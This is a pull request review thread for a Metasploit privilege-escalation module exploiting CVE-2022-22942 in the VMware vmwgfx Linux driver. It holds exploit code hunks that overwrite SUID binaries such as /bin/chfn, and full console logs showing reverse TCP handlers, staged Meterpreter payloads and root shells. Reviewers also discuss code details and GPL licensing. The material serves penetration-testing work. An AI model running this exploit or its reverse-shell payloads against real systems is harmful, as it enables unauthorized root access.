### PR TITLE
cve-2022-22942: linux priv esc on VMWare Virtual Machines, with kernel 4.14-rc1 - 5.17-rc1

### PR DESCRIPTION
**Pull request by h00die**
One of two exploits in #17200

This PR adds a linux priv esc against VMWare virtual machines with kernel 4.14-rc1 - 5.17-rc1 due to a VMWare driver bug.

If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to
recover by deallocating the (already populated) file descriptor. This is
wrong, as the fd gets released via put_unused_fd() which shouldn't be used,
as the fd table slot was already populated via the previous call to
fd_install(). This leaves userland with a valid fd table entry pointing to
a free'd 'file' object.

We use this bug to overwrite a SUID binary with our payload and gain root.
Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.

Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.

## Verification

1. Start msfconsole
2. Get an initial user shell
3. Do: `use linux/local/vmwgfx_fd_priv_esc`
4. Do: `set session [#]`
5. Do: `run`
6. You should get a root shell.

### CODE REVIEW

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb [hunk 1]
```diff
@@ -0,0 +1,178 @@
...
+    unless Rex::Version.new(release) > Rex::Version.new('4.14-rc1') &&
+           Rex::Version.new(release) < Rex::Version.new('5.17-rc1')
+      return CheckCode::Safe("Kernel version #{release} is not vulnerable")
+    end
+
+    vprint_good "Kernel version #{release} appears to be vulnerable"
+
+    @driver = nil
+
+    if writable?('/dev/dri/card0') # ubuntu
```
Comment (jvoisin) [inline modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:86]: `ubuntu` and `RHEL` iirc :)

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb [hunk 2]
```diff
@@ -0,0 +1,178 @@
...
+      @suid_target = '/bin/chfn'
+    elsif writable?('/bin/chage') # RHEL/Centos
+      @suid_target = '/bin/chage'
+    else
+      return CheckCode::Safe('Unable to write to /bin/chfn or /bin/chage')
+    end
+    vprint_good("#{@suid_target} suid binary found")
+
+    vmwgfx = cmd_exec('modinfo vmwgfx | grep version')
+    if vmwgfx.include? 'version'
```
Comment (bcoles) [inline modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:106]: As you're only checking that the `vmwgfx` module is installed, not using the version, you could use `kernel_modules` instead.

```suggestion
    if kernel_modules.include?('vmwgfx')
```

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb [hunk 3]
```diff
@@ -0,0 +1,178 @@
...
+  end
+
+  # replace our suid target back to the original so we don't leave
+  def on_new_session(session)
+    super
+    if @suid_backup.nil?
+      print_bad("MANUAL replacement of trojaned #{@suid_target} is required.")
+    else
+      print_status("Replacing trojaned #{@suid_target} with original")
+      fd = session.fs.file.open(@suid_target, 'wb')
```
Comment (bcoles) [inline modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:173]: I'm not sure if `session.fs.file.open` is usable on shell sessions. I thought it was Meterpreter only.

The module `SessionTypes` lists both `shell` and `meterpreter`.

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb [hunk 4]
```diff
@@ -0,0 +1,178 @@
...
+      fd.write(@suid_backup)
+      fd.close
+    end
+  end
```
Comment (bcoles) [inline modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:177]: `on_new_session` is only called when a session is created.

This cleanup won't be performed in instances where exploitation is successful but we don't get a session (ie, blocked egress firewall rules), or for payloads which do not create a session (ie, add user).

The usual approach is to perform cleanup in `cleanup` method and use a `@variable` to maintain state (ie, whether the backup executable will be restored).

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb [hunk 5]
```diff
@@ -0,0 +1,178 @@
...
+      c_code = c_code.gsub('/proc/self/exe', payload_path) # change exe to our payload
+
+      upload_and_compile executable_path, strip_comments(c_code)
+      register_files_for_cleanup(executable_path)
+    else
+      unless @suid_target == '/bin/chfn'
+        fail_with(Failure::BadConfig, 'Pre-compiled is only valid against Ubuntu based systems')
+      end
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      payload_path = '/tmp/.aYd3GAMlK'
```
Comment (jvoisin) [inline modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:152]: Couldn't this path be de-hardcoded by searching'n'replacing it in the pre-compiled binary?

Comment (jvoisin) [inline modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:152]: Why hardcode the `payload_path` here?

File: data/exploits/CVE-2022-22942/cve-2022-22942-dc.c [hunk 6]
```diff
@@ -0,0 +1,601 @@
...
+ * This is CVE-2022-22942.
+ *
+ * (c) 2022 Open Source Security, Inc.
+ *
+ * - minipli
+ *
+ *  This program is free software; you can redistribute it and/or modify
+ *  it under the terms of the GNU General Public License as published by
+ *  the Free Software Foundation; either version 2 of the License, or
+ *  (at your option) any later version.
```
Comment (adfoster-r7) [inline data/exploits/CVE-2022-22942/cve-2022-22942-dc.c:44]: Are we allowed to accept this license? 👀

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb [hunk 7]
```diff
@@ -0,0 +1,178 @@
...
+      upload_and_chmodx executable_path, exploit_data('CVE-2022-22942', 'pre_compiled')
```
Comment (adfoster-r7) [inline modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:153]: Note to the reviewer to use a R7 compiled version instead

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb [hunk 8]
```diff
@@ -0,0 +1,178 @@
...
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    # Check the kernel version to see if its in a vulnerable range
+    release = kernel_release
+    unless Rex::Version.new(release) > Rex::Version.new('4.14-rc1') &&
+           Rex::Version.new(release) < Rex::Version.new('5.17-rc1')
```
Comment (adfoster-r7) [inline modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:78]: Note to reviewer, we should verify Rex::Version handles the `rc1` convention as expected - we've seen otehr modules break with other strings in them such as `a`/`b`/etc as identifiers

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb (hunk 5 above)
Comment (adfoster-r7) [inline modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:152]: Is this left over debug code? Or should this be random too 👀

File: data/exploits/CVE-2022-22942/cve-2022-22942-dc.c (hunk 6 above)
Comment (jheysel-r7) [reply data/exploits/CVE-2022-22942/cve-2022-22942-dc.c:44]: Hey @h00die, it's come to my attention that we actually can't really accept code with a GNU General Public License. I would hate for the effort put into this module (and https://github.com/rapid7/metasploit-framework/pull/17301) to go to waste. 

Would you maybe be open to asking the original author if they would consider changing the license to one that we accept? If not we'd have to re-implement the C code which would be a pain. 

=========== Acceptable Licenses at Rapid7 ===============
Third Party Software dedicated to the public domain or licensed
pursuant to permissive licenses which do not restrict use,
modification, distribution, and hosting of the Open Source Software
(such as [Apache v1.1](https://opensource.org/licenses/Apache-1.1), [Apache v2.0](https://opensource.org/licenses/Apache-2.0),[ BSD-style](https://opensource.org/licenses/BSD-3-Clause), [MIT-style](https://opensource.org/licenses/MIT), [PostgreSQL](https://opensource.org/licenses/PostgreSQL),
[Boost](https://opensource.org/licenses/BSL-1.0), [Zlib/libpng](https://opensource.org/licenses/Zlib), and [W3C](https://opensource.org/licenses/W3C) licenses).

**Unmodified** Third Party Software licensed pursuant to Public
Licenses (such as [Mozilla Public License (MPL) v2.0](https://opensource.org/licenses/MPL-2.0), [Common
Development and Distribution License (CDDL)](https://opensource.org/licenses/CDDL-1.0), [Eclipse Public License
(EPL)](https://opensource.org/licenses/EPL-1.0), [Common Public License](https://opensource.org/licenses/CPL-1.0), and [Microsoft Public
License (Ms-PL)](https://opensource.org/licenses/MS-PL).

My apologies for just bringing this up now, I was unaware of this policy when I started the review. Really hoping we can land these two modules 🤞.

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb (hunk 4 above)
Comment (h00die) [reply modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:177]: I believe (maybe i had shell issues at the time) that `cleanup` would happen on the original shell (lower privs) if there was an issue getting a new high priv shell (or a payload-less shell).  In that case, we wouldn't be able to write the non-trojan file back, so seemed to not make sense to try it anyways.

**Comment by h00die** [comment]
going to wait on any review comments till after @minipli-oss responds about the license.

**Comment by minipli-oss** [comment]
The code is GPLv2 and I don't see why that would be an issue -- at least not for the stand-alone PoC.

Beside that, IANAL, so can't give any legal advice if mixing licenses as this project does is fine or not.

Jut noticed, while grepping through the sources, I can see quite a few GPL'ed files, even [GPLv3 ones](https://github.com/rapid7/metasploit-framework/blob/master/external/source/exploits/CVE-2018-8120/LICENSE).

**Comment by sempervictus** [comment]
AFAIK, and at least according to [this](https://opensource.stackexchange.com/questions/6647/license-of-the-linux-kernel-user-space-api-headers), things linking against the kernel are GPLv2 even if only hitting UAPI headers.

**Comment by h00die** [comment]
so how are we standing on these two exploits? My interest in re-writing the original source code is `nil` so if we can't figure out a path forward, I can just close the PRs.

**Comment by sempervictus** [comment]
I dont think that its possible to maintain a framework for hackers without handling GPL is some way or another - it _is_ a licensing plague, but its endemic and highly prevalent in the ecosystem. If we carry linux kernel exploits, then we have to accept GPL code because the licensing scheme for exploits requiring linking of or sources which are themselves GPL makes the exploit code GPL too.
Aside from GPL code dependencies for MetasploitModules, the actual runtime dependencies include things like Metasm which is LGPL and pretty sure _yard_ of all things is GPL so you kinda can't make a Ruby project w/out allowing the license. Not a lawyer by any stretch, but we're here to hack (learn) and emulate attackers - attackers will mix and match any licenses, so us being constrained by potential concerns of a legal scholar goes directly against the intent: if we won't include things that real attackers use, we cannot accurately simulate their behavior.

**Comment by h00die** [comment]
@smcintyre-r7 what about adding the file(s) to the LICENSE file, along with a link to where the author gave consent for it to be added? That seams reasonable to me

**Comment by ccondon-r7** [comment]
Hi all, please hold while we talk to our lawyers. @sempervictus, I hear you, but we aren't making the rules here, and we also have to ensure we're in line with what the business needs. We're undertaking a larger effort right now to document GPL usage in MSF to understand use cases and dependencies. Thanks for your patience!

**Comment by sempervictus** [comment]
Thank you very much ma'am.
In the worst-case scenario of legal determining that there _is_ a legal danger to R7 (something i think we all want to avoid), would a community-maintained `tainted_licenses` plugin be a viable alternative? Something we could keep in a dedicated org separate from R7 (keep the same commit rights, just have someone else "own" it) which users would elect to install into their framework/pro if they wanted the functionality to avoid redist of the resulting code/bins/etc. Doing it for _just_ `MetasploitModule`s is trivial, and i believe can work for any parts of `/lib` so long as we get the dependency ordering (or i guess zeitwerk magic) down pat.

**Comment by bwatters-r7** [comment]
I am decidedly not a lawyer, but here's an attempt to make them happy: https://github.com/h00die/metasploit-framework/pull/20

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb (hunk 3 above)
Comment (h00die) [reply modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:172]: seems to actually work, but i'm going to go with a better answer.

```
msf6 exploit(multi/script/web_delivery) > sessions -l

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x86/linux               2.2.2.2:4444 -> 1.1.1.1:47318 (1.1.1.1)

msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Kernel version 5.13.12-051312-generic appears to be vulnerable
[+] /dev/dri/card0 found writable
[+] /bin/chfn suid binary found
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /root/.msf4/loot/20230117174516_default_1.1.1.1_binchfn_923893.bin
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Max line length is 65537
[*] Writing 10812 bytes in 1 chunks of 39245 bytes (octal-encoded), using printf
[*] Uploading payload to /tmp/.GW3waLU
[*] Writing '/tmp/.GW3waLU' (282 bytes) ...
[*] Max line length is 65537
[*] Writing 282 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 1.1.1.1
[*] [~] creating r/o mapping of /bin/chfn...
[*] [~] creating r/o mapping of /tmp/.GW3waLU...
[*] [~] spawning helper processes...
[*] [~] vmwgfx setup using /dev/dri/card0...
[*] [+] confirmed to be targeting the right driver
[*] [~] predicted fence fd = 6
[*] [~] triggering fence fd export...
[*] [~] RCU GP passed and file object released -- by now or soon!
[*] [~] probing stale fd for a match...
[*] [~] closing stale fd...
[*] [~] RCU GP passed and file object released again -- hopefully!
[*] [~] stale_fd_worker: done
[+] Deleted /tmp/.YvQO9il
[*] Replacing trojaned /bin/chfn with original
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:47320) at 2023-01-17 17:45:21 -0500

meterpreter >
```

Comment (h00die) [reply modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:172]: I should say it didn't throw an error, I didn't verify the file was rewritten successfully

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb (hunk 5 above)
Comment (h00die) [reply modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:151]: this is the value used in the pre-compiled version

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb [hunk 9]
```diff
@@ -0,0 +1,174 @@
...
+        'Notes' => {
+          'Stability' => [CRASH_OS_DOWN],
+          'Reliability' => [REPEATABLE_SESSION],
+          # seeing "BUG: Bad page cache in process <process> pfn:<5 characters>" on console
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
```
Comment (jvoisin) [inline modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:66]: 'A directory where we can write and execute files' :)

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb [hunk 10]
```diff
@@ -0,0 +1,174 @@
...
+    end
+    vprint_good("#{@driver} found writable")
+
+    @suid_target = nil
+    if setuid?('/bin/chfn') # ubuntu
+      @suid_target = '/bin/chfn'
+    elsif writable?('/bin/chage') # RHEL/Centos
+      @suid_target = '/bin/chage'
+    else
+      return CheckCode::Safe('Unable to write to /bin/chfn or /bin/chage')
```
Comment (jvoisin) [inline modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:101]: 'Unable to find /bin/chfn or /bin/chage' :)

File: modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb (hunk 9 above)
Comment (h00die) [reply modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb:66]: we should prob change that in the example as well... those need an overhaul.

**Comment by jheysel-r7** [comment]
_Good news everyone!_ We've gotten word for our purposes, LGPL and GPLv2 are acceptable. 

Testing checks out 👍 thanks for the contribution! 
```
msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 rport=4444 username=msfuser password=notpassword

[*] 172.16.199.132:22 - Starting bruteforce
[+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 8 opened (172.16.199.1:55151 -> 172.16.199.132:22) at 2023-01-20 09:34:18 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run session=8 rhosts=172.16.199.132 rport=4445

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture:
[*] Started reverse TCP handler on 172.16.199.1:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /Users/jheysel/.msf4/loot/20230120093436_default_172.16.199.132_binchfn_034079.bin
[*] Uploading payload to /tmp/.6ntizxlWd8
[*] Writing '/tmp/.6ntizxlWd8' (282 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045348 bytes) to 172.16.199.132
[+] Deleted /tmp/.oWt34mDG4b
[*] Meterpreter session 9 opened (172.16.199.1:4445 -> 172.16.199.132:36990) at 2023-01-20 09:34:45 -0500
[*] Replacing trojaned /bin/chfn with original

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 22.04 (Linux 5.13.12-051312-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

**Comment by jheysel-r7** [comment]
Hey @h00die, I just compiled the exploit myself and was going to push up the R7 compiled version although when testing I wasn't able to get a root shell when `compile` is set to `False`.  

I compiled the exploit on my Ubuntu test target with the vulnerable kernel. Did you test your pre_compiled binary / any idea what could be causing this issue? 
```
msfuser@msfuser-virtual-machine:~$ gcc -O2 cve-2022-22942-dc.c -o pre_compiled
cve-2022-22942-dc.c: In function ‘main’:
cve-2022-22942-dc.c:514:17: warning: ignoring return value of ‘setuid’ declared with attribute ‘warn_unused_result’ [-Wunused-result]
  514 |                 setuid(0);
      |                 ^~~~~~~~~
cve-2022-22942-dc.c:515:17: warning: ignoring return value of ‘setgid’ declared with attribute ‘warn_unused_result’ [-Wunused-result]
  515 |                 setgid(0);
      |                 ^~~~~~~~~
msfuser@msfuser-virtual-machine:~$
```


```
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set verbose true
verbose => true
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set compile False
compile => False
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run

[*] Started reverse TCP handler on 172.16.199.1:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Kernel version 5.13.12-051312-generic appears to be vulnerable
[+] /dev/dri/card0 found writable
[+] /bin/chfn suid binary found
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /Users/jheysel/.msf4/loot/20230120135607_default_172.16.199.132_binchfn_887706.bin
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.PotYt1KOJ' (26904 bytes) ...
[*] Uploading payload to /tmp/.aYd3GAMlK
[*] Writing '/tmp/.aYd3GAMlK' (282 bytes) ...
[*] Launching exploit...
[*] [~] creating r/o mapping of /bin/chfn...
[*] [~] creating r/o mapping of /proc/self/exe...
[*] [~] spawning helper processes...
[*] [~] vmwgfx setup using /dev/dri/card0...
[*] [+] confirmed to be targeting the right driver
[*] [~] predicted fence fd = 6
[*] [~] triggering fence fd export...
[*] [~] RCU GP passed and file object released -- by now or soon!
[*] [~] probing stale fd for a match...
[*] [~] closing stale fd...
[*] [~] RCU GP passed and file object released again -- hopefully!
[*] [~] stale_fd_worker: done
[*] Replacing trojaned /bin/chfn with original
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set compile True
compile => True
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run

[*] Started reverse TCP handler on 172.16.199.1:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Kernel version 5.13.12-051312-generic appears to be vulnerable
[+] /dev/dri/card0 found writable
[+] /bin/chfn suid binary found
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /Users/jheysel/.msf4/loot/20230120140102_default_172.16.199.132_binchfn_246472.bin
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Uploading payload to /tmp/.bjnH3
[*] Writing '/tmp/.bjnH3' (282 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 172.16.199.132
[+] Deleted /tmp/.DTO3jY
[*] Meterpreter session 7 opened (172.16.199.1:4445 -> 172.16.199.132:43420) at 2023-01-20 14:01:06 -0500
[*] [~] creating r/o mapping of /bin/chfn...
[*] [~] creating r/o mapping of /tmp/.bjnH3...
[*] [~] spawning helper processes...
[*] [~] vmwgfx setup using /dev/dri/card0...
[*] [+] confirmed to be targeting the right driver
[*] [~] predicted fence fd = 7
[*] [~] triggering fence fd export...
[*] [~] RCU GP passed and file object released -- by now or soon!
[*] [~] probing stale fd for a match...
[*] [~] closing stale fd...
[*] [~] RCU GP passed and file object released again -- hopefully!
[*] [~] stale_fd_worker: done
[*] Replacing trojaned /bin/chfn with original

meterpreter > getuid
Server username: root
```

**Comment by h00die** [comment]
No issues for me on pre-compiled:

```
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set Compile False
Compile => False
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set verbose true
verbose => true
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Kernel version 5.13.12-051312-generic appears to be vulnerable
[+] /dev/dri/card0 found writable
[+] /bin/chfn suid binary found
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /root/.msf4/loot/20230122060634_default_2.2.2.2_binchfn_369121.bin
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.7JowgCuA' (27152 bytes) ...
[*] Max line length is 65537
[*] Writing 27152 bytes in 2 chunks of 44034 bytes (octal-encoded), using printf
[*] Next chunk is 28808 bytes
[*] Uploading payload to /tmp/.aYd3GAMlK
[*] Writing '/tmp/.aYd3GAMlK' (282 bytes) ...
[*] Max line length is 65537
[*] Writing 282 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 2.2.2.2
[*] [~] creating r/o mapping of /bin/chfn...
[*] [~] creating r/o mapping of /tmp/.aYd3GAMlK...
[*] [~] spawning helper processes...
[*] [~] vmwgfx setup using /dev/dri/card0...
[*] [+] confirmed to be targeting the right driver
[*] [~] predicted fence fd = 5
[*] [~] triggering fence fd export...
[*] [~] RCU GP passed and file object released -- by now or soon!
[*] [~] probing stale fd for a match...
[*] [~] closing stale fd...
[*] [~] RCU GP passed and file object released again -- hopefully!
[*] [~] stale_fd_worker: done
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:43172) at 2023-01-22 06:06:42 -0500
[*] Replacing trojaned /bin/chfn with original
[*] Max line length is 65537
[*] Writing 72712 bytes in 5 chunks of 37947 bytes (octal-encoded), using printf
[*] Next chunk is 55243 bytes
[*] Next chunk is 52149 bytes
[*] Next chunk is 46026 bytes
[*] Next chunk is 15582 bytes

meterpreter > getuid
Server username: root
meterpreter > 
```

**Comment by h00die** [comment]
I don't build it by hand, I just comment out the `register_files_for_cleanup` lines then `download` the files from the root meterp.  *however* since the payload name gets compiled into the binary, you'll want to hardcode the payload name prior to running the exploit to grab the system compiled binary

**Comment by jheysel-r7** [comment]
Thanks for the tip @h00die, was able to follow that and get my pre_compiled binary working. Shipping time 🚢 
```
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture:
[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Kernel version 5.13.12-051312-generic appears to be vulnerable
[+] /dev/dri/card0 found writable
[+] /bin/chfn suid binary found
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /home/msfuser/.msf4/loot/20230131093141_default_172.16.199.132_binchfn_279597.bin
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.h9Isa' (27160 bytes) ...
[*] Max line length is 65537
[*] Writing 27160 bytes in 2 chunks of 44038 bytes (octal-encoded), using printf
[*] Next chunk is 28831 bytes
[*] Uploading payload to /tmp/.aYd3GAMlK
[*] Writing '/tmp/.aYd3GAMlK' (282 bytes) ...
[*] Max line length is 65537
[*] Writing 282 bytes in 1 chunks of 844 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] [~] creating r/o mapping of /bin/chfn...
[*] [~] creating r/o mapping of /tmp/.aYd3GAMlK...
[*] [~] spawning helper processes...
[*] [~] vmwgfx setup using /dev/dri/card0...
[*] [+] confirmed to be targeting the right driver
[*] [~] predicted fence fd = 5
[*] [~] triggering fence fd export...
[*] [~] RCU GP passed and file object released -- by now or soon!
[*] [~] probing stale fd for a match...
[*] [~] closing stale fd...
[*] [~] RCU GP passed and file object released again -- hopefully!
[*] [~] stale_fd_worker: done
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 172.16.199.132
[*] Meterpreter session 10 opened (172.16.199.158:4444 -> 172.16.199.132:51776) at 2023-01-31 09:31:49 -0800
[*] Replacing trojaned /bin/chfn with original
[*] Max line length is 65537
[*] Writing 72712 bytes in 5 chunks of 41544 bytes (octal-encoded), using printf
[*] Next chunk is 48286 bytes
[*] Next chunk is 52136 bytes
[*] Next chunk is 46032 bytes
[*] Next chunk is 15587 bytes

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 22.04 (Linux 5.13.12-051312-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

**Comment by jheysel-r7** [comment]
# Release Notes
This PR adds a linux priv esc against VMWare virtual machines with kernel 4.14-rc1 - 5.17-rc1 due to a VMWare driver bug.

**Pull request merged**